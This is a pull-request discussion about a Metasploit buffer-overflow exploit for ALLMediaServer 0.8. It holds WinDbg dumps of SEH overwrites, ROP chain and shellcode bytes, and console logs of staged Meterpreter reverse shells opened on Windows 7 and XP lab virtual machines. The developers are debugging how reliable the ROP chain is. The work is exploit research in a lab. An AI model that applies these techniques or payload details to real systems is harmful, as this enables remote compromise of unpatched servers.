Review of pull request #606

[jvazquez-r7]

Changes:

• Make it msftidy compliant
• Make it compatible with Windows 7 SP1

[modpr0be]

Tested, and worked. Sorry I must have slept away. thanks anyway.
Obviously will learn from the modified version.

[modpr0be]

Hi, I'm sorry for late follow up. This exploit works on my W7 SP1 on my VM, then I tested on another machine, the exploit doesn't work. I tried mine also, and it works. The operating system is still same, latest update from ms. Here is the dump of this exploit (#607):

0:007> bp 65ec74dc
0:007> t
eax=0200fd2c ebx=00000000 ecx=00000000 edx=0a3bde94 esi=0200fd2c edi=0200fd1c
eip=77106fe9 esp=0200f5cc ebp=0200fd40 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiUserExceptionDispatcher+0x1:
77106fe9 8b4c2404        mov     ecx,dword ptr [esp+4] ss:0023:0200f5d0=f0f50002
0:007> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=65ec74dc edx=771071ad esi=00000000 edi=00000000
eip=65ec74dc esp=0200f4ec ebp=0200f50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_53!avpriv_aac_parse_header+0x104c:
65ec74dc 81c4cc060000    add     esp,6CCh
0:007> d esp+6cc
0200fbb8  86 9e 7c 9a a7 02 96 4d-da 88 eb 4c 51 05 3e 2e  ..|....M...LQ.>.
0200fbc8  02 fa b5 ae c3 6b dc 7a-3f f1 10 d5 7e 64 51 3e  .....k.z?...~dQ>
0200fbd8  c3 d7 25 f7 0c 9f ca 8e-b9 ca 95 62 35 09 0b 6c  ..%........b5..l
0200fbe8  c0 2e 92 1a 2d 05 31 5f-12 d5 ff 70 d5 40 85 b1  ....-.1_...p.@..
0200fbf8  e6 d4 43 fa 49 c9 d6 f3-63 c4 cf c6 c9 86 48 2e  ..C.I...c.....H.
0200fc08  ba 5e a1 c5 e6 e0 1b 8c-ea fc a9 28 68 1a 7b 08  .^.........(h.{.
0200fc18  de e8 11 ed 1c f4 25 b9-6d 07 ac f5 8b b2 3f 86  ......%.m.....?.
0200fc28  d9 2c e9 d8 c4 d3 e0 60-6d 58 ff 4b 3a 7c 71 20  .,.....`mX.K:|q 
0:007> d esp+6cc L100
0200fbb8  86 9e 7c 9a a7 02 96 4d-da 88 eb 4c 51 05 3e 2e  ..|....M...LQ.>.
0200fbc8  02 fa b5 ae c3 6b dc 7a-3f f1 10 d5 7e 64 51 3e  .....k.z?...~dQ>
0200fbd8  c3 d7 25 f7 0c 9f ca 8e-b9 ca 95 62 35 09 0b 6c  ..%........b5..l
0200fbe8  c0 2e 92 1a 2d 05 31 5f-12 d5 ff 70 d5 40 85 b1  ....-.1_...p.@..
0200fbf8  e6 d4 43 fa 49 c9 d6 f3-63 c4 cf c6 c9 86 48 2e  ..C.I...c.....H.
0200fc08  ba 5e a1 c5 e6 e0 1b 8c-ea fc a9 28 68 1a 7b 08  .^.........(h.{.
0200fc18  de e8 11 ed 1c f4 25 b9-6d 07 ac f5 8b b2 3f 86  ......%.m.....?.
0200fc28  d9 2c e9 d8 c4 d3 e0 60-6d 58 ff 4b 3a 7c 71 20  .,.....`mX.K:|q 
0200fc38  68 46 63 e0 ab b5 a6 44-2f e8 80 f2 e6 92 8d 4e  hFc....D/......N
0200fc48  05 b1 30 87 31 94 de 1d-ac 8b 05 13 b0 dc 4f 00  ..0.1.........O.
0200fc58  e7 70 4c 47 b9 46 97 4f-1b 7f c9 cb a3 d9 fc 13  .pLG.F.O........
0200fc68  d8 40 f9 e2 1a 1b 76 e2-03 ab 69 3a 5d e4 17 8c  .@....v...i:]...
0200fc78  e9 9a 9e b3 92 bd 72 82-43 87 18 f9 3b 9a 19 9f  ......r.C...;...
0200fc88  a7 dc e8 a4 bb dc b4 b7-97 60 d4 23 ac 00 65 10  .........`.#..e.
0200fc98  25 2d c1 a5 8f e3 b7 7e-a5 b5 0c 53 a4 d1 40 70  %-.....~...S..@p
0200fca8  5f d0 bf ba 52 3e 40 6c-df 96 36 f8 c9 82 bc d9  _...R>@l..6.....

and here is mine (#606)

0:009> !exchain
02b6f8e8: MediaServer+13444a (0053444a)
02b6fd48: avformat_53!avpriv_dv_produce_packet+119ad (6ab3535d)
Invalid exception stack at f41406eb
0:009> bp 6ab3535d
0:009> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=6ab3535d edx=771071ad esi=00000000 edi=00000000
eip=6ab3535d esp=02b6f4ec ebp=02b6f50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avformat_53!avpriv_dv_produce_packet+0x119ad:
6ab3535d 81c44c040000    add     esp,44Ch
0:009> d esp+44c L100
02b6f938  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a1 0a 5a 66  ..Zf..Zf..Zf..Zf
02b6f948  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a1 0a 5a 66  ..Zf..Zf..Zf..Zf
02b6f958  a1 0a 5a 66 a1 0a 5a 66-a1 0a 5a 66 a7 fa f6 65  ..Zf..Zf..Zf...e
02b6f968  e0 e4 1e 67 b4 cc c1 6a-df ee 7c 66 6d 75 75 65  ...g...j..|fmuue
02b6f978  9d f0 f5 65 0d 83 f9 65-d5 c1 c1 6a 01 02 00 00  ...e...e...j....
02b6f988  e2 a1 72 66 40 00 00 00-df 09 5a 66 3d 8a d5 6a  ..rf@.....Zf=..j
02b6f998  71 a7 c7 6a a1 0a 5a 66-f4 f9 82 66 90 90 90 90  q..j..Zf...f....
02b6f9a8  d2 cb 3d 66 81 c4 54 f2-ff ff b8 10 da 50 09 db  ..=f..T......P..
02b6f9b8  d6 d9 74 24 f4 5e 29 c9-b1 4f 31 46 14 83 c6 04  ..t$.^)..O1F....
02b6f9c8  03 46 10 f2 2f ac e1 7b-cf 4d f2 1b 59 a8 c3 09  .F../..{.M..Y...
02b6f9d8  3d b8 76 9d 35 ec 7a 56-1b 05 08 1a b4 2a b9 90  =.v.5.zV.....*..
02b6f9e8  e2 05 3a 15 2b c9 f8 34-d7 10 2d 96 e6 da 20 d7  ..:.+..4..-... .
02b6f9f8  2f 06 ca 85 f8 4c 79 39-8c 11 42 38 42 1e fa 42  /....Ly9..B8B..B
02b6fa08  e7 e1 8f f8 e6 31 3f 77-a0 a9 4b df 11 cb 98 3c  .....1?w..K....<
02b6fa18  6d 82 95 f6 05 15 7c c7-e6 27 40 8b d8 87 4d d2  m.....|..'@...M.
02b6fa28  1d 2f ae a1 55 53 53 b1-ad 29 8f 34 30 89 44 ee  ./..USS..).40.D.

msf exploit(allmediaserver_bof) > exploit

[] Started reverse handler on 10.10.10.2:4444
[] Sending payload to ALLMediaServer on Windows 7 SP1 - English...
[] Sending stage (752128 bytes) to 10.10.10.7
[] Meterpreter session 1 opened (10.10.10.2:4444 -> 10.10.10.7:2630) at 2012-07-15 12:51:24 +0700

meterpreter > sysinfo
Computer : LAB1
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter >

OS Version:
C:\Users\lab>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601

C:\Users\lab>

[jvazquez-r7]

Hi modpr0be,

Today I'll do new tests on W7 SP1 over VirtualBox and VMware fresh virtual machines. If we cannot confirm exploit reliability on W7SP1 with ROP between virtual/physical machines maybe we'll need to avoid ROP on W7. Since W7 is optin by default could be acceptable :)

I'll update with results along the day.

[modpr0be]

Hi jvazquez,

Ok. Thanks for this. Will do the same test on VMware fresh install.

cheers.

[jvazquez-r7]

Hi modpr0be,

Working on vmware virtual machine:

msf  exploit(allmediaserver_bof) > set target 1
target => 1
msf  exploit(allmediaserver_bof) > set RHOST 192.168.1.137
RHOST => 192.168.1.137
msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.137
[*] Meterpreter session 3 opened (192.168.1.157:4444 -> 192.168.1.137:49161) at 2012-07-15 15:50:19 +0200

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

But failing on a virtual box:

msf  exploit(allmediaserver_bof) > set target 1
target => 1
msf  exploit(allmediaserver_bof) > set RHOST 192.168.1.132
RHOST => 192.168.1.132
msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
msf  exploit(allmediaserver_bof) > 

The crash on the virtual box virtual machine:

(ee8.e5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=019bfd2c ebx=00000000 ecx=00000000 edx=6f62b418 esi=019bfd2c edi=019bfd1c
eip=00407cc0 esp=019bf8d4 ebp=019bfd40 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
MediaServer+0x7cc0:
00407cc0 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:6f62b410=????????
0:006> !exchain
019bf8e8: MediaServer+13444a (0053444a)
019bfd48: *** ERROR: Symbol file could not be found.  Defaulted to
export symbols for C:\Program Files\ALLMediaServer\avcodec-53.dll -
avcodec_53!avpriv_aac_parse_header+104c (65ec74dc)
Invalid exception stack at 539706eb
0:006> bp 65ec74dc
0:006> g
Breakpoint 0 hit
eax=00000000 ebx=00000000 ecx=65ec74dc edx=778071cd esi=00000000 edi=00000000
eip=65ec74dc esp=019bf4ec ebp=019bf50c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
avcodec_53!avpriv_aac_parse_header+0x104c:
65ec74dc 81c4cc060000    add     esp,6CCh
0:006> dd esp + 6cc
019bfbb8  685e8d55 68493408 8031b335 ca8f7708
019bfbc8  0c14b8b8 f37724b7 40434832 4b8492c6
019bfbd8  033d6df7 31974de7 adab911c 9a071121
019bfbe8  09ee7219 654cd442 e7a89d96 50921f67
019bfbf8  e3acef0d 8215297c 02b3a9ca 3a4fdf3b
019bfc08  2acfa068 7aef339a 7923567b 438d7853
019bfc18  ba89a0cf 05fd5780 d2aed9e9 b49a9229
019bfc28  0f14e825 0e6522a3 3dc44977 6df0dd54
0:006> dd esp + 6cc - 150
019bfa68  665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa78  665a0aa1 665a0aa1 665a0aa1 665a0aa1
019bfa88  665a0aa1 665a0aa1 665a0aa1 65f6faa7
019bfa98  671ee4e0 6ac1ccb4 667ceedf 70476972
019bfaa8  65f5f09d 65f9830d 6ac1c1d5 00000600
019bfab8  6672a1e2 00000040 665a09df 6ad58a3d
019bfac8  6ac7a771 665a0aa1 6682f9f4 90909090
019bfad8  663dcbd2 00026fe9 53b8ca00 70102cef

Ugly :\ Performing more testing....

[jvazquez-r7]

Avoiding ROP exploit makes it work on W7 even on virtualbox:

msf  exploit(allmediaserver_bof_no_rop) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows 7 SP1 - English...
[*] Sending stage (752128 bytes) to 192.168.1.132
[*] Meterpreter session 4 opened (192.168.1.157:4444 -> 192.168.1.132:49221) at 2012-07-15 16:28:40 +0200

meterpreter > sysinfo
Computer        : JUAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > 

Now checking if the exploit with rop is reliable across different virtual machines with Windows XP SP3. I'm thinking in avoiding ROP exploit in the case of W7... anyway it's OptOut and Allmediaserver runs without dep by default.

[jvazquez-r7]

Tested successfully with ROP on Virtualbox:

msf  exploit(allmediaserver_bof) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.157:4444 
[*] Sending payload to ALLMediaServer on ALLMediaServer 0.8 / Windows XP SP3 - English...
[*] Sending stage (752128 bytes) to 192.168.1.133
[*] Meterpreter session 5 opened (192.168.1.157:4444 -> 192.168.1.133:1097) at 2012-07-15 16:35:53 +0200

meterpreter > sysinfo
Computer        : HOME-DF26FC7444
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine .....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > 

Im going to send a new pull request, avoiding ROP in the case of W7 and asking a more experienced developer to agree with the decision :)

[modpr0be]

Well, avoiding ROP should be OK then. I've had time now, just finished work, I'll try the test again.

[jvazquez-r7]

Hi modpr0be,

Feel free to test pull request #608 as patch for the W7 situation until ROP reliable version is built! I'm going to ask a more experienced developer to check. In the meanwhile try to build a ROP chain reliable between environments could be nice, maybe prepending a lot of ROP nops before the rop chain.